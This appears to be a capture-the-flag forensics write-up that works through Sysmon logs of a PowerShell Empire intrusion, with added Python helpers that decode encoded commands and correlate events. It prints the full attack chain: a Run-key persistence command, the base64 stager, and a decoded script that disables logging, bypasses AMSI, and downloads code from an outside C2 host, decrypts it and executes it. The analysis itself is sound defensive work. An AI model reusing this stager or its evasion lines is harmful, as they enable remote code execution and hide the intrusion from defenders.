Investigating Windows 3.x

What is the registry key with the encoded payload? (full path)

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated

# First way
# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
# EventID 13 is registry value set
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

TimeCreated  : 1/21/2021 5:08:13 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 13
Message      : Registry value set:
               RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
               EventType: SetValue
               UtcTime: 2021-01-22 01:08:13.468
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               Image: C:\Windows\Explorer.EXE
               TargetObject:
               HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
               Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp
               HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

# Second way
You can also view /Desktop/sysmon.evtx by opening it in Event Viewer.
Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

# View Registry in registry editor
HKCU:Software\Microsoft\Windows\CurrentVersion\Debug

What is the rule name for this run key generated by Sysmon?

Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

T1547.001

What tactics are classified with this MITRE ATT&CK ID?

# https://attack.mitre.org/techniques/T1547/
Persistence, Privilege Escalation

What was UTC time for the Sysmon event?

Registry value set:
RuleName: technique_id=T1547.001,technique_name=Registry Run Keys / Start Folder
EventType: SetValue
UtcTime: 2021-01-22 01:08:13.468
ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
ProcessId: 2684
Image: C:\Windows\Explorer.EXE
TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
Details: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"

2021-01-22 01:08:13.468

What was the Sysmon Event ID? Event Type? (answer, answer)

# https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
13, SetValue

Decode the payload. What service will the payload attempt to start?

% cat encode.txt | base64 -d > decode.txt
% cat decode.txt
sc.exe start Fax;
$FTPServer = "localhost";
$FTPPort = "9299";
$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort);
$tcpStream = $tcpConnection.GetStream();
$reader = New-Object System.IO.StreamReader($tcpStream);
$writer = New-Object System.IO.StreamWriter($tcpStream);
$writer.AutoFlush = $true;

Fax

The payload attempts to open a local port. What is the port number?

9299

What process does the payload attempt to terminate?

kill (Get-Process FXSSVC).Id -force; Remove-Item -path  'C:\Windows\System32\ualapi.dll';IF($PSVErSIONTABlE.PSVErsIoN.MAJOr -GE 3){$fff6=[ref].ASsemBLy.GetTypE('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');If($ffF6){$B9BE=$fFf6.GETValUe($NULL);If($B9bE['ScriptB'+'lockLogging']){$B9Be['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$b9Be['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[COLlECtiOnS.GEnErIc.DIcTIoNARy[STrinG,SyStEM.OBjecT]]::nEw();$Val.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$b9bE['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ElSE{[SCRipTBlock]."GeTFie`ld"('signatures','N'+'onPublic,Static').SETVaLue($nULl,(New-OBjECt COLlectIoNs.GEnerIC.HaSHSeT[sTrIng]))}$Ref=[Ref].ASSEmbly.GeTType('System.Management.Automation.Amsi'+'Utils');$REf.GEtFIELD('amsiInitF'+'ailed','NonPublic,Static').SetVaLUE($nuLl,$TruE);};[SystEm.NET.SErVICEPoIntMAnAgeR]::ExPEcT100COnTInue=0;$27CE=NeW-OBJEct SYsTEm.NEt.WEBClIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExt.ENCoDiNg]::UNiCoDe.GETString([COnVeRt]::FrOMBAsE64STrINg('aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA==')));$t='/admin/get.php';$27CE.HeadErs.ADD('User-Agent',$u);$27Ce.PrOxY=[SySTEm.NET.WEBREqUesT]::DefAUltWEBPROXY;$27ce.PROXy.CrEDENTIals = [SyStem.NEt.CREdEnTiAlCAChE]::DEFAULTNeTwoRKCrEdenTiALS;$Script:Proxy = $27ce.Proxy;$K=[SystEm.TeXT.EnCoDiNg]::ASCII.GeTBYTes('awXUDkit<oV9JcROL{%gQ.|3nHqMpA/l');$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$27CE.HeaDers.AdD("Cookie","RjMeek=ZmQLHacMBXrLcB+VElvLcwO26EY=");$DatA=$27Ce.DOwnloAdDAtA($Ser+$T);$iv=$DaTA[0..3];$DatA=$dAtA[4..$Data.lENgth];-jOIN[CHAr[]](& $R $dAtA ($IV+$K))|IEX

FXSSVC

What DLL file does the payload attempt to remove? (full path)

Remove-Item -path  'C:\Windows\System32\ualapi.dll'

ualapi.dll

What is the Windows Event ID associated with this service?

# The hint pointed me to Printer
Applications and Services Logs > Microsoft > Windows > PrintService > Admin

823

What is listed as the New Default Printer?

The default printer was changed to PrintDemon. See the event user data for context information.

PrintDemon

What process is associated with this event?

# Find ualapi.dll in Procmon64

spoolsv.exe

What is the parent PID for the above process?

620

Examine the other processes. What is the PID of the process running the encoded payload?

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

TimeCreated  : 1/21/2021 5:05:45 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: technique_id=T1059.001,technique_name=PowerShell
               UtcTime: 2021-01-22 01:05:45.938
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
               Description: Windows PowerShell
               Product: Microsoft® Windows® Operating System
               Company: Microsoft Corporation
               OriginalFileName: PowerShell.EXE
               CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJAB
               QAFMAVgBFAHIAUwBJAE8ATgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJAB
               mAGYAZgA2AD0AWwByAGUAZgBdAC4AQQBTAHMAZQBtAEIATAB5AC4ARwBlAHQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgB
               hAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdABpAGwAcwAnACkALgAiAEcAZQB0AEYAaQBlAGAAbABkACIAKAA
               nAGMAYQBjAGgAZQBkAEcAcgBvAHUAcABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbAB
               pAGMALABTAHQAYQB0AGkAYwAnACkAOwBJAGYAKAAkAGYAZgBGADYAKQB7ACQAQgA5AEIARQA9ACQAZgBGAGYANgAuAEcARQBUAFYAYQB
               sAFUAZQAoACQATgBVAEwATAApADsASQBmACgAJABCADkAYgBFAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwB
               pAG4AZwAnAF0AKQB7ACQAQgA5AEIAZQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwB
               FAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABiADkAQgBlAFsAJwB
               TAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbAB
               vAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAdgBBAGwAPQBbAEMATwBMAGwARQBDAHQAaQB
               PAG4AUwAuAEcARQBuAEUAcgBJAGMALgBEAEkAYwBUAEkAbwBOAEEAUgB5AFsAUwBUAHIAaQBuAEcALABTAHkAUwB0AEUATQAuAE8AQgB
               qAGUAYwBUAF0AXQA6ADoAbgBFAHcAKAApADsAJABWAGEAbAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwA
               nAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABWAEEATAAuAEEARABkACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdAB
               CAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAGIAOQBiAEUAWwAnAEgASwBFAFkAXwB
               MAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwB
               mAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwB
               nAGkAbgBnACcAXQA9ACQAVgBBAGwAfQBFAGwAUwBFAHsAWwBTAEMAUgBpAHAAVABCAGwAbwBjAGsAXQAuACIARwBlAFQARgBpAGUAYAB
               sAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA
               uAFMARQBUAFYAYQBMAHUAZQAoACQAbgBVAEwAbAAsACgATgBlAHcALQBPAEIAagBFAEMAdAAgAEMATwBMAGwAZQBjAHQASQBvAE4AcwA
               uAEcARQBuAGUAcgBJAEMALgBIAGEAUwBIAFMAZQBUAFsAcwBUAHIASQBuAGcAXQApACkAfQAkAFIAZQBmAD0AWwBSAGUAZgBdAC4AQQB
               TAFMARQBtAGIAbAB5AC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwB
               tAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAGYALgBHAEUAdABGAEkARQBMAEQAKAAnAGEAbQB
               zAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB
               0AFYAYQBMAFUARQAoACQAbgB1AEwAbAAsACQAVAByAHUARQApADsAfQA7AFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFMARQByAFYASQB
               DAEUAUABvAEkAbgB0AE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AFAARQBjAFQAMQAwADAAQwBPAG4AVABJAG4AdQBlAD0AMAA7ACQAMgA
               3AEMARQA9AE4AZQBXAC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUAbQAuAE4ARQB0AC4AVwBFAEIAQwBsAEkAZQBOAFQAOwAkAHUAPQA
               nAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgB
               pAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKAB
               bAFQARQB4AHQALgBFAE4AQwBvAEQAaQBOAGcAXQA6ADoAVQBOAGkAQwBvAEQAZQAuAEcARQBUAFMAdAByAGkAbgBnACgAWwBDAE8AbgB
               WAGUAUgB0AF0AOgA6AEYAcgBPAE0AQgBBAHMARQA2ADQAUwBUAHIASQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA
               4AEEATAB3AEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE0AUQBBADIAQQB
               EAEUAQQBPAGcAQQA1AEEARABBAEEATQBBAEEAeABBAEEAPQA9ACcAKQApACkAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgB
               wAGgAcAAnADsAJAAyADcAQwBFAC4ASABlAGEAZABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA
               7ACQAMgA3AEMAZQAuAFAAcgBPAHgAWQA9AFsAUwB5AFMAVABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBxAFUAZQBzAFQAXQA6ADoARAB
               lAGYAQQBVAGwAdABXAEUAQgBQAFIATwBYAFkAOwAkADIANwBjAGUALgBQAFIATwBYAHkALgBDAHIARQBEAEUATgBUAEkAYQBsAHMAIAA
               9ACAAWwBTAHkAUwB0AGUAbQAuAE4ARQB0AC4AQwBSAEUAZABFAG4AVABpAEEAbABDAEEAQwBoAEUAXQA6ADoARABFAEYAQQBVAEwAVAB
               OAGUAVAB3AG8AUgBLAEMAcgBFAGQAZQBuAFQAaQBBAEwAUwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAAyADcAYwB
               lAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AEUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQB
               JAC4ARwBlAFQAQgBZAFQAZQBzACgAJwBhAHcAWABVAEQAawBpAHQAPABvAFYAOQBKAGMAUgBPAEwAewAlAGcAUQAuAHwAMwBuAEgAcQB
               NAHAAQQAvAGwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBHAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA
               1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwA
               kAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJAB
               JACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJAB
               IAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJAB
               IAF0AKQAlADIANQA2AF0AfQB9ADsAJAAyADcAQwBFAC4ASABlAGEARABlAHIAcwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgB
               SAGoATQBlAGUAawA9AFoAbQBRAEwASABhAGMATQBCAFgAcgBMAGMAQgArAFYARQBsAHYATABjAHcATwAyADYARQBZAD0AIgApADsAJAB
               EAGEAdABBAD0AJAAyADcAQwBlAC4ARABPAHcAbgBsAG8AQQBkAEQAQQB0AEEAKAAkAFMAZQByACsAJABUACkAOwAkAGkAdgA9ACQARAB
               hAFQAQQBbADAALgAuADMAXQA7ACQARABhAHQAQQA9ACQAZABBAHQAQQBbADQALgAuACQARABhAHQAYQAuAGwARQBOAGcAdABoAF0AOwA
               tAGoATwBJAE4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABBAHQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
               CurrentDirectory: C:\Users\Administrator\
               User: WIN-Q5JJRDM876J\Administrator
               LogonGuid: {786593ca-776c-6009-5ea8-030000000000}
               LogonId: 0x3A85E
               TerminalSessionId: 1
               IntegrityLevel: High
               Hashes: SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6
               E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
               ParentProcessGuid: {786593ca-24a3-600a-e400-000000000300}
               ParentProcessId: 3624
               ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Decode the payload. What is the visible partial path?

;$t='/admin/get.php';

/admin/get.php
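The `-enc` argument is base64 over UTF-16LE, so `base64 -d` alone (as used above) leaves a NUL byte after every character; the following added example (not part of this writeup) decodes it properly and pulls out the indicators used in this and the next questions: the C2 URL hidden in the nested `FromBase64String` call, the `$t` URI path, the User-Agent and the destination port. `STAGER_EXCERPT` is a constructed excerpt of the decoded stager quoted on this page and `SAMPLE_COMMANDLINE` is a constructed CommandLine in the shape of the Sysmon Event ID 1 record; all function names are my own.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed excerpt of the decoded stager quoted on this page: the C2 URL in a
# nested base64 string, the URI path in $t and the User-Agent in $u. Rest omitted.
STAGER_EXCERPT = (
    "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$ser=$([TExt.ENCoDiNg]::UNiCoDe.GETString([COnVeRt]::FrOMBAsE64STrINg("
    "'aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA==')));"
    "$t='/admin/get.php';$27CE.HeadErs.ADD('User-Agent',$u);"
)


def encode_for_enc(script):
    """Build what powershell.exe -enc expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed CommandLine in the shape of the Sysmon Event ID 1 record on this page.
SAMPLE_COMMANDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -noP -sta -w 1 -enc '
    + encode_for_enc(STAGER_EXCERPT)
)

# -enc, -EncodedCommand, -ec and -e are all accepted spellings of the switch.
ENC_FLAG = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
NESTED_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.IGNORECASE)


def extract_enc_argument(cmdline):
    """Return the base64 blob that follows the encoded-command switch."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        raise ValueError("no encoded command argument in command line")
    return m.group(1)


def decode_encoded_command(b64):
    """base64 -> UTF-16LE text. Plain `base64 -d` stops one step short of this and
    leaves a NUL byte after every character."""
    return base64.b64decode(b64).decode("utf-16-le")


def _bytes_to_text(raw):
    """The stager decodes its nested blob with [Text.Encoding]::Unicode (UTF-16LE);
    fall back to UTF-8 when the bytes have no NUL high bytes."""
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def _resolve_var(script, name):
    """Value of the first `$name='...'` assignment in the script, or None."""
    m = re.search(r"\$" + re.escape(name) + r"\s*=\s*['\"]([^'\"]*)['\"]", script, re.IGNORECASE)
    return m.group(1) if m else None


def analyze_stager(script):
    """Pull the network indicators a responder wants out of a decoded stager."""
    nested = [_bytes_to_text(base64.b64decode(b)) for b in NESTED_B64.findall(script)]
    c2_url = next((s for s in nested if s.lower().startswith("http")), None)
    ua_ref = re.search(r"['\"]User-Agent['\"]\s*,\s*\$(\w+)", script, re.IGNORECASE)
    return {
        "c2_url": c2_url,
        "destination_port": urlparse(c2_url).port if c2_url else None,
        "uri_path": _resolve_var(script, "t"),
        "user_agent": _resolve_var(script, ua_ref.group(1)) if ua_ref else None,
    }


def analyze_commandline(cmdline):
    """End to end: Sysmon CommandLine field -> decoded stager -> indicators."""
    return analyze_stager(decode_encoded_command(extract_enc_argument(cmdline)))
```

The decoded C2 URL is the IP and port that the Sysmon Event ID 3 records and the nslookup below resolve.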

This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)

# https://github.com/EmpireProject/Empire
# https://www.powershellempire.com/?page_id=110

DefaultProfile, Empire

What other file paths are you likely to find in the logs? (answer, answer)

/news.php, /login/process.php

What is the MITRE ATT&CK URI for the attack framework?

# Google 'MITRE /news.php, /login/process.php attack'

https://attack.mitre.org/software/S0363/

What was the FQDN of the attacker machine that the suspicious process connected to?

% nslookup 34.245.128.161
161.128.245.34.in-addr.arpa    name = ec2-34-245-128-161.eu-west-1.compute.amazonaws.com.

Authoritative answers can be found from:

ec2-34-245-128-161.eu-west-1.compute.amazonaws.com

What other process connected to the attacker machine?

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=3' | Sort-Object TimeCreated | fl


TimeCreated  : 1/21/2021 5:05:50 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               RuleName: technique_id=T1059.001,technique_name=PowerShell
               UtcTime: 2021-01-21 19:52:53.946
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               User: WIN-Q5JJRDM876J\Administrator
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.10.146
               SourceHostname: -
               SourcePort: 49736
               SourcePortName: -
               DestinationIsIpv6: false
               DestinationIp: 34.245.128.161
               DestinationHostname: -
               DestinationPort: 9001
               DestinationPortName: -

TimeCreated  : 1/21/2021 5:07:10 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               RuleName: technique_id=T1043,technique_name=Commonly Used Port
               UtcTime: 2021-01-21 19:54:13.834
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               Image: C:\Windows\explorer.exe
               User: WIN-Q5JJRDM876J\Administrator
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.10.146
               SourceHostname: -
               SourcePort: 49737
               SourcePortName: -
               DestinationIsIpv6: false
               DestinationIp: 34.245.128.161
               DestinationHostname: -
               DestinationPort: 9001
               DestinationPortName: -

explorer.exe

What is the PID for this process?

2684

What was the path for the first image loaded for the process identified in Q's 19 & 20?

# Filter with procmon
Operation = Load Image
PID = 2684

c:\Windows\System32\mscoree.dll

What Sysmon event was generated between these 2 processes? What is its associated Event ID #? (answer, answer)

# First, understand the question. The 2 processes are the ones identified above:
# powershell.exe (PID 3088, from the Sysmon Event ID 1 Process Create event) and
# explorer.exe (PID 2684, from the Sysmon Event ID 13 Registry value set event)
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=1' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/EventID=13' | Sort-Object TimeCreated | Where-Object {$_.Message -like "*enc*"} | fl

# Look at every event between 1/21/2021 5:05:50 PM and 1/21/2021 5:08:13 PM
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath '*/System/*' | Sort-Object TimeCreated

CreateRemoteThread, 1

What is the UTC time for the first event between these 2 processes?

# The event of interest is at 1/21/2021 5:07:06 PM
$date = [datetime]"1/21/2021 5:07:06 PM"
# TimeCreated carries milliseconds, so match a one-second window rather than comparing with -eq
Get-WinEvent -Path .\Sysmon.evtx -FilterXPath "*/System/EventID=8" | Sort-Object TimeCreated | Where-Object {$_.TimeCreated -ge $date -and $_.TimeCreated -lt $date.AddSeconds(1)} | fl

TimeCreated  : 1/21/2021 5:07:06 PM
ProviderName : Microsoft-Windows-Sysmon
Id           : 8
Message      : CreateRemoteThread detected:
               RuleName: -
               UtcTime: 2021-01-22 01:07:06.182
               SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               SourceProcessId: 3088
               SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               TargetProcessId: 2684
               TargetImage: C:\Windows\explorer.exe
               NewThreadId: 4872
               StartAddress: 0x00000000027D0000
               StartModule: -
               StartFunction: -

2021-01-22 01:07:06.182
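The last three questions come down to correlating Sysmon events by ProcessGuid: the time-window approach used above, and the stricter check for events whose GUID fields reference both processes (which is how the Event ID 8 CreateRemoteThread from powershell.exe into explorer.exe stands out). This added example (not from the writeup) parses Format-List output into dicts and does both; `SAMPLE_FL_OUTPUT` is a constructed, trimmed copy of the five events quoted on this page, and the function names are my own.

```python
import re
from datetime import datetime

# Constructed sample, trimmed from the Format-List (fl) output on this page: the
# five Sysmon events that tie powershell.exe (PID 3088) to explorer.exe (PID 2684).
SAMPLE_FL_OUTPUT = r"""
TimeCreated  : 1/21/2021 5:05:45 PM
Id           : 1
Message      : Process Create:
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088

TimeCreated  : 1/21/2021 5:05:50 PM
Id           : 3
Message      : Network connection detected:
               ProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               ProcessId: 3088
               DestinationPort: 9001

TimeCreated  : 1/21/2021 5:07:06 PM
Id           : 8
Message      : CreateRemoteThread detected:
               SourceProcessGuid: {786593ca-24e9-600a-eb00-000000000300}
               SourceProcessId: 3088
               TargetProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               TargetProcessId: 2684

TimeCreated  : 1/21/2021 5:07:10 PM
Id           : 3
Message      : Network connection detected:
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               DestinationPort: 9001

TimeCreated  : 1/21/2021 5:08:13 PM
Id           : 13
Message      : Registry value set:
               ProcessGuid: {786593ca-776d-6009-4b00-000000000300}
               ProcessId: 2684
               TargetObject: HKU\S-1-5-21-1022688529-3069809663-3800007983-500\Software\Microsoft\Windows\CurrentVersion\Run\Updater
"""

POWERSHELL_GUID = "{786593ca-24e9-600a-eb00-000000000300}"  # PID 3088
EXPLORER_GUID = "{786593ca-776d-6009-4b00-000000000300}"    # PID 2684
GUID_FIELDS = ("ProcessGuid", "SourceProcessGuid", "TargetProcessGuid", "ParentProcessGuid")


def parse_time(text):
    """TimeCreated as Get-WinEvent prints it: local time, no milliseconds."""
    return datetime.strptime(text.strip(), "%m/%d/%Y %I:%M:%S %p")


def parse_fl_records(text):
    """One flat dict per event: the 'Key : Value' header lines plus the
    indented 'Key: Value' lines of the Message body."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            m = re.match(r"^(\w+)\s+:\s*(.*)$", line) or re.match(r"^\s+(\w+):\s*(.*)$", line)
            if m:
                rec[m.group(1)] = m.group(2).strip()
        rec["TimeCreated"] = parse_time(rec["TimeCreated"])
        rec["Id"] = int(rec["Id"])
        records.append(rec)
    return records


def events_in_window(records, start, end):
    """The approach used above: every event between the two timestamps, inclusive."""
    return sorted((r for r in records if start <= r["TimeCreated"] <= end), key=lambda r: r["TimeCreated"])


def events_linking(records, guid_a, guid_b):
    """Stricter: events whose GUID fields reference BOTH processes (e.g. Event ID 8)."""
    hits = [r for r in records if {guid_a, guid_b} <= {r[f] for f in GUID_FIELDS if f in r}]
    return sorted(hits, key=lambda r: r["TimeCreated"])


def first_event_between(records, guid_a, guid_b):
    """Summary of the earliest event linking the two processes, or None."""
    linked = events_linking(records, guid_a, guid_b)
    if not linked:
        return None
    r = linked[0]
    return {"Id": r["Id"], "Message": r["Message"], "time": r["TimeCreated"].isoformat()}


RECORDS = parse_fl_records(SAMPLE_FL_OUTPUT)
```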

